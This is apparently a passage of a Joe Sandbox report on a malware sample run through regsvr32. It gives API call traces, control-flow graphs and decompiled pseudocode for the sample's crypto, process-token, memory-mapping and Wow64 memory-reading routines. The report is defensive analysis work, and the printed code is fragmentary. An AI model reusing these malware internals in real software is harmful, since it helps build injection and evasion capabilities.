96 4bd47c3-4bd47d2 call 4bde8ab 83->96 87->88 90 4bd4760 call 4bcb4b5 87->90 88->56 88->83 90->88 95->96 96->56 100 4bd47d8-4bd47eb RtlAllocateHeap 96->100 100->56 101 4bd47f1-4bd4811 OpenEventA 100->101 102 4bd4833-4bd4835 101->102 103 4bd4813-4bd4822 CreateEventA 101->103 105 4bd4836-4bd485d call 4bd9dc6 102->105 104 4bd4824-4bd482e GetLastError 103->104 103->105 104->56 108 4bd49ca-4bd49d1 105->108 109 4bd4863-4bd4871 105->109 108->56 110 4bd4877-4bd488f call 4bccea8 109->110 111 4bd4923-4bd4929 109->111 110->56 127 4bd4895-4bd489c 
110->127 112 4bd492b-4bd4930 call 4bd7341 call 4bc9d25 111->112 113 4bd4935-4bd493c 111->113 112->113 113->55 116 4bd4942-4bd4947 113->116 119 4bd4949-4bd494f 116->119 120 4bd49a3-4bd49c8 call 4bd9dc6 116->120 124 4bd495e-4bd4974 RtlAllocateHeap 119->124 125 4bd4951-4bd4958 SetEvent 119->125 120->108 130 4bd49d3-4bd49d4 120->130 128 4bd4976-4bd499d wsprintfA 124->128 129 4bd49a0-4bd49a2 124->129 125->124 131 4bd489e-4bd48aa 127->131 132 4bd48b0-4bd48c4 LoadLibraryA 127->132 128->129 129->120 130->55 131->132 133 4bd48c6-4bd48ee call 4be4b16 132->133 134 4bd48f3-4bd4906 call 4bcdb44 132->134 133->134 134->56 138 4bd490c-4bd4915 134->138 138->113 139 4bd4917-4bd4921 call 4be25fc 138->139 139->113
                APIs
                • RtlInitializeCriticalSection.NTDLL(04BEE4A8), ref: 04BD457E
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BD45AF
                • RtlInitializeCriticalSection.NTDLL(0624C0A0), ref: 04BD45C0
                  • Part of subcall function 04BD6126: RtlInitializeCriticalSection.NTDLL(04BEE480), ref: 04BD614A
                  • Part of subcall function 04BD6126: RtlInitializeCriticalSection.NTDLL(04BEE460), ref: 04BD6160
                  • Part of subcall function 04BD6126: GetVersion.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD6171
                  • Part of subcall function 04BD6126: GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD61A5
                  • Part of subcall function 04BD75A8: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 04BD75C2
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD45E9
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD45FA
                • CloseHandle.KERNEL32(000002B4,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD460E
                • GetUserNameA.ADVAPI32(00000000,?), ref: 04BD4657
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD466A
                • GetUserNameA.ADVAPI32(00000000,?), ref: 04BD467F
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04BD46AF
                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46C4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46CE
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46DB
                • GetShellWindow.USER32 ref: 04BD46F6
                • GetWindowThreadProcessId.USER32(00000000), ref: 04BD46FD
                • memcpy.NTDLL(04BEE374,?,00000018,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4739
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD47B7
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BD47E1
                • OpenEventA.KERNEL32(00100000,00000000,0624B9D0,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4809
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000,0624B9D0,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD481E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4824
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD48BC
                • SetEvent.KERNEL32(?,04BE3A35,00000000,00000000,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD4952
                • RtlAllocateHeap.NTDLL(00000000,00000043,04BE3A35), ref: 04BD4967
                • wsprintfA.USER32 ref: 04BD4997
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                • String ID:
                • API String ID: 3929413950-0
                • Opcode ID: 054ef15d0940e7c110941593c02cd6cf842dd3660cbb40efa9574b24495592ff
                • Instruction ID: a226696ffb7c9cafe1f0f51a14118ce6733f3e785c38a1492a99b6f5615f3c06
                • Opcode Fuzzy Hash: 054ef15d0940e7c110941593c02cd6cf842dd3660cbb40efa9574b24495592ff
                • Instruction Fuzzy Hash: 13C159B09002459FD720EF67E88892A7BE8EBC5714B0148EFE54A8B141E779F854CB72
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 221 31f78f2-31f7932 CryptAcquireContextW 222 31f7a89-31f7a8f GetLastError 221->222 223 31f7938-31f7974 memcpy CryptImportKey 221->223 224 31f7a92-31f7a99 222->224 225 31f797a-31f798c CryptSetKeyParam 223->225 226 31f7a74-31f7a7a GetLastError 223->226 228 31f7992-31f799b 225->228 229 31f7a60-31f7a66 GetLastError 225->229 227 31f7a7d-31f7a87 CryptReleaseContext 226->227 227->224 231 31f799d-31f799f 228->231 232 31f79a3-31f79b0 call 31f2114 228->232 230 31f7a69-31f7a72 CryptDestroyKey 229->230 230->227 231->232 233 31f79a1 231->233 236 31f7a57-31f7a5e 232->236 237 31f79b6-31f79bf 232->237 233->232 236->230 238 31f79c2-31f79ca 237->238 239 31f79cf-31f79ec memcpy 238->239 240 31f79cc 238->240 241 31f79ee-31f7a05 CryptEncrypt 239->241 242 31f7a07-31f7a16 CryptDecrypt 239->242 240->239 243 31f7a1c-31f7a1e 241->243 242->243 244 31f7a2e-31f7a39 GetLastError 243->244 245 31f7a20-31f7a2a 243->245 247 31f7a4d-31f7a55 call 31f2c11 244->247 248 31f7a3b-31f7a4b 244->248 245->238 246 31f7a2c 245->246 246->248 247->230 248->230
                C-Code - Quality: 58%
                			E031F78F2(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				int _v8;
                				long* _v12;
                				int _v16;
                				BYTE* _v20;
                				long* _v24;
                				void* _v39;
                				char _v40;
                				void _v56;
                				int _v60;
                				intOrPtr _v64;
                				void _v67;
                				char _v68;
                				void* _t61;
                				int _t68;
                				signed int _t76;
                				int _t79;
                				int _t81;
                				int _t85;
                				long _t86;
                				int _t90;
                				signed int _t94;
                				int _t101;
                				BYTE* _t102;
                				int _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                
                				_t103 = __eax;
                				_t94 = 6;
                				_v68 = 0;
                				memset( &_v67, 0, _t94 << 2);
                				_t105 = _t104 + 0xc;
                				asm("stosw");
                				asm("stosb");
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				asm("stosb");
                				_t61 =  *0x31fa0a8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                				if(_t61 == 0) {
                					_a8 = GetLastError();
                				} else {
                					_t101 = 0x10;
                					memcpy( &_v56, _a8, _t101);
                					_t106 = _t105 + 0xc;
                					_v60 = _t101;
                					_v67 = 2;
                					_v64 = 0x660e;
                					_v68 = 8;
                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                					if(_t68 == 0) {
                						_a8 = GetLastError();
                					} else {
                						_push(0);
                						_push( &_v40);
                						_push(1);
                						_push(_v12);
                						if( *0x31fa0d0() == 0) {
                							_a8 = GetLastError();
                						} else {
                							_t18 = _t103 + 0xf; // 0x11f
                							_t76 = _t18 & 0xfffffff0;
                							if(_a4 != 0 && _t76 == _t103) {
                								_t76 = _t76 + _t101;
                							}
                							_t102 = E031F2114(_t76);
                							_v20 = _t102;
                							if(_t102 == 0) {
                								_a8 = 8;
                							} else {
                								_v16 = 0;
                								_a8 = 0;
                								while(1) {
                									_t79 = 0x10;
                									_v8 = _t79;
                									if(_t103 <= _t79) {
                										_v8 = _t103;
                									}
                									memcpy(_t102, _a12, _v8);
                									_t81 = _v8;
                									_a12 = _a12 + _t81;
                									_t103 = _t103 - _t81;
                									_t106 = _t106 + 0xc;
                									if(_a4 == 0) {
                										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                									} else {
                										_t85 =  *0x31fa0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                									}
                									if(_t85 == 0) {
                										break;
                									}
                									_t90 = _v8;
                									_v16 = _v16 + _t90;
                									_t102 =  &(_t102[_t90]);
                									if(_t103 != 0) {
                										continue;
                									} else {
                										L17:
                										 *_a16 = _v20;
                										 *_a20 = _v16;
                									}
                									goto L21;
                								}
                								_t86 = GetLastError();
                								_a8 = _t86;
                								if(_t86 != 0) {
                									E031F2C11(_v20);
                								} else {
                									goto L17;
                								}
                							}
                						}
                						L21:
                						CryptDestroyKey(_v12);
                					}
                					CryptReleaseContext(_v24, 0);
                				}
                				return _a8;
                			}

                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,031F7307), ref: 031F792A
                • memcpy.NTDLL(?,031F7307,00000010,?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92), ref: 031F7943
                • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 031F796C
                • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 031F7984
                • memcpy.NTDLL(00000000,031F4F92,031F7307,0000011F), ref: 031F79D6
                • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,031F7307,00000020,?,?,0000011F), ref: 031F79FF
                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,031F7307,?,?,0000011F), ref: 031F7A16
                • GetLastError.KERNEL32(?,?,0000011F), ref: 031F7A2E
                • GetLastError.KERNEL32 ref: 031F7A60
                • CryptDestroyKey.ADVAPI32(?), ref: 031F7A6C
                • GetLastError.KERNEL32 ref: 031F7A74
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 031F7A81
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92,031F7307,?,031F7307), ref: 031F7A89
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 1967744295-0
                • Opcode ID: 69c9f192f710221c404aa80caf066945fa85468d5edd4b313cc1ebb16e19f9b9
                • Instruction ID: ae40e6cb8cc4e62f0abd3c262e4179838ce38abf7a603f4e75eb66014488f48f
                • Opcode Fuzzy Hash: 69c9f192f710221c404aa80caf066945fa85468d5edd4b313cc1ebb16e19f9b9
                • Instruction Fuzzy Hash: 72518071900209FFDF14DFA4DC84AEEBBB9FB48390F094529FA15E6280D7358A948F61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Graph image not preserved; basic blocks 4bc8c50-4bc8d92 with calls to StrRChrA, _strupr, lstrlen, CreateEventA, RtlAddVectoredExceptionHandler, GetLastError, RtlRemoveVectoredExceptionHandler and subfunctions 4bd28fe, 4bcd4f4, 4bdd697, 4bc34ea, 4bd4560
                APIs
                • StrRChrA.SHLWAPI(0624B5B0,00000000,0000005C,?,?,?), ref: 04BC8C8C
                • _strupr.NTDLL ref: 04BC8CA2
                • lstrlen.KERNEL32(0624B5B0,?,?), ref: 04BC8CAA
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 04BC8D2A
                • RtlAddVectoredExceptionHandler.NTDLL(00000000,04BC44E1), ref: 04BC8D51
                • GetLastError.KERNEL32(?,?,?,?), ref: 04BC8D6B
                • RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC8D81
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                • String ID:
                • API String ID: 2251957091-0
                • Opcode ID: 8dcff40dbf0b2cbcfefed2cfccfe46f0b45ea15a0b82a67120366756b5167953
                • Instruction ID: 62ca540361c6780271d51a8dd88578c8a4bb9310c781666c4c4a05591b7cab5f
                • Opcode Fuzzy Hash: 8dcff40dbf0b2cbcfefed2cfccfe46f0b45ea15a0b82a67120366756b5167953
                • Instruction Fuzzy Hash: 82310A729001159FEB20BF79ACC492EB7A5E784302F0545AFE912DB181D739EC809BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 04BCD53B
                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 04BCD54E
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 04BCD56A
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 04BCD587
                • memcpy.NTDLL(?,00000000,0000001C), ref: 04BCD594
                • NtClose.NTDLL(?), ref: 04BCD5A6
                • NtClose.NTDLL(?), ref: 04BCD5B0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 8ad03b73d34e899e3971d585431b26919280d6bc65946b8b80829a50d00d21f5
                • Instruction ID: b86f495e739a41615ea1ce9dba6fcb637f72b617f898feb75dc5b66bd7135621
                • Opcode Fuzzy Hash: 8ad03b73d34e899e3971d585431b26919280d6bc65946b8b80829a50d00d21f5
                • Instruction Fuzzy Hash: 3E211672900229BFDF01AF95CC85ADEBFBDEF48744F104066F904EA150D7719A409BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 38%
                			E031F373D(char _a4, void* _a8) {
                				void* _v8;
                				void* _v12;
                				char _v16;
                				void* _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);
                					if(_t33 >= 0) {
                						_t47 = __imp__;
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                						_t44 = E031F2114(_a4);
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);
                								_t48 = 1;
                							}
                							E031F2C11(_t44);
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}

                Disassembly address column (0x031f374a-0x031f3804); instruction text not preserved in this extraction

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 031F3784
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 031F3797
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031F37B3
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031F37D0
                • memcpy.NTDLL(?,00000000,0000001C), ref: 031F37DD
                • NtClose.NTDLL(?), ref: 031F37EF
                • NtClose.NTDLL(00000000), ref: 031F37F9
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: b545be8b49dc19245a573ef949e4b780e1e300174583db63b76e6ec3160ef1f0
                • Instruction ID: 18c6220736652402e05262db1ca54c5d8a10abfa93585692e45235d42e4a5823
                • Opcode Fuzzy Hash: b545be8b49dc19245a573ef949e4b780e1e300174583db63b76e6ec3160ef1f0
                • Instruction Fuzzy Hash: 912105B6900218BFDB01EFA5CC45ADEBFBDEB0C750F104062FA04A6150D7728A919BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCAFFC
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04BCB009
                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BCB095
                • GetModuleHandleA.KERNEL32(00000000), ref: 04BCB0A0
                • RtlImageNtHeader.NTDLL(00000000), ref: 04BCB0A9
                • RtlExitUserThread.NTDLL(00000000), ref: 04BCB0BE
                  • Part of subcall function 04BE3AA2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BCB037,?), ref: 04BE3AAA
                  • Part of subcall function 04BE3AA2: GetVersion.KERNEL32 ref: 04BE3AB9
                  • Part of subcall function 04BE3AA2: GetCurrentProcessId.KERNEL32 ref: 04BE3AD0
                  • Part of subcall function 04BE3AA2: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BE3AED
                  • Part of subcall function 04BD7B55: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,04BCB045,?), ref: 04BD7BB4
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                  • Part of subcall function 04BCAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                  • Part of subcall function 04BCAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                  • Part of subcall function 04BCAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                  • Part of subcall function 04BCAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                  • Part of subcall function 04BCAEC5: CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                • String ID:
                • API String ID: 3675227105-0
                • Opcode ID: df1f07bbd51cd7c1c0342c55fcf58fc18ac16bdbcdccbe757670d002a5ff5122
                • Instruction ID: ac519cc1d4b84c38c3f696d38391b2ff40b030a0c5149ea2bac72e668030340a
                • Opcode Fuzzy Hash: df1f07bbd51cd7c1c0342c55fcf58fc18ac16bdbcdccbe757670d002a5ff5122
                • Instruction Fuzzy Hash: DA319171900118AFCB21EF75ECC5A6E77A4EB84754F1041AAE561EB141D734AD44CBB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,04BC48CA,00000800,?,?,00000000,00000000), ref: 04BCAA3F
                  • Part of subcall function 04BC87CD: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BCA90D,?,?,?,00000000,00000000), ref: 04BC87F2
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8814
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC882A
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8840
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8856
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC886C
                  • Part of subcall function 04BD0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                  • Part of subcall function 04BE3C23: memcpy.NTDLL(?,?,?,?,?,?,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BE3C89
                  • Part of subcall function 04BE3C23: memcpy.NTDLL(00000000,?,?), ref: 04BE3CE8
                • memcpy.NTDLL(?,?,?,?,?,04BCC6EC,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BCA96C
                • memcpy.NTDLL(?,?,00000018,?,?,04BCC6EC,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BCA9B8
                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 04BCAA7D
                • memset.NTDLL ref: 04BCAABF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                • String ID:
                • API String ID: 1575695328-0
                • Opcode ID: 40ad7a02566979ba8ef6992f5896cc58bf6358c70a5e77fc88ef82b366c9dd24
                • Instruction ID: bf6c0a6ef5c6af6d42ae34394071ee872a934fa1a2ac8f0bc650a42ed3e5e07c
                • Opcode Fuzzy Hash: 40ad7a02566979ba8ef6992f5896cc58bf6358c70a5e77fc88ef82b366c9dd24
                • Instruction Fuzzy Hash: 33913871A0020AEFDB10DF99C9C4BAEBBB4FF08304F1445ADE811A7250E775BA95DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 04BDBF19
                  • Part of subcall function 04BD0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                • memset.NTDLL ref: 04BDBF3D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction ID: fb95fab5400bd0269f5b1889f063e0d85e469862e1f89fc1fd284a30d91ab475
                • Opcode Fuzzy Hash: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction Fuzzy Hash: 73210E75D04209AFDB11DFA9C884DEEFBF9EB48354F1045A9E615F3250E730AA448F60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcAddress.KERNEL32(?,00000318), ref: 04BCE501
                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BCE51D
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                  • Part of subcall function 04BCB45A: GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                  • Part of subcall function 04BCB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BCE687
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                • String ID:
                • API String ID: 3547194813-0
                • Opcode ID: 36ae3f760aa42676b7e742b9884a64ae2227031d289d7bbdfb043be859b6911a
                • Instruction ID: 677161ef2109871818f0cd49e83580891b1373face0e9a488d7650f4b3280ad0
                • Opcode Fuzzy Hash: 36ae3f760aa42676b7e742b9884a64ae2227031d289d7bbdfb043be859b6911a
                • Instruction Fuzzy Hash: 69613C71A1020AEFDB14DFA8C980BAEBBB4FF08304F0045A9E915EB251D770F955CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BC6F84
                • GetProcAddress.KERNEL32(?), ref: 04BC6FAC
                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04BC6FCA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressInformationProcProcess64QueryWow64memset
                • String ID:
                • API String ID: 2968673968-0
                • Opcode ID: 15d000d64738ed6ef73021e67e0ea6f066b984b56ee5d1e0beb46a0399cfeac9
                • Instruction ID: d7d26c29bc2bd978787b49165a47feebba8c4acd98c12b1a2e7989d43b7c5978
                • Opcode Fuzzy Hash: 15d000d64738ed6ef73021e67e0ea6f066b984b56ee5d1e0beb46a0399cfeac9
                • Instruction Fuzzy Hash: 18112E31A00219AFEB10DF99DC85F99B7B9EB84704F054069F908EB291EB74ED15CB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtAllocateVirtualMemory.NTDLL(04BD6359,00000000,00000000,04BD6359,00003000,00000040), ref: 04BE3EAE
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BE3EB5
                • SetLastError.KERNEL32(00000000), ref: 04BE3EBC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$AllocateLastMemoryStatusVirtual
                • String ID:
                • API String ID: 722216270-0
                • Opcode ID: d25703a47c19e9ea18ccbd4f7d14cc7c891c21e17007ea382935464015ad2f42
                • Instruction ID: f722d7c21e4caedd534baaf22c5baf546c58e1a73113c06ca06ce2b6e0ff2db7
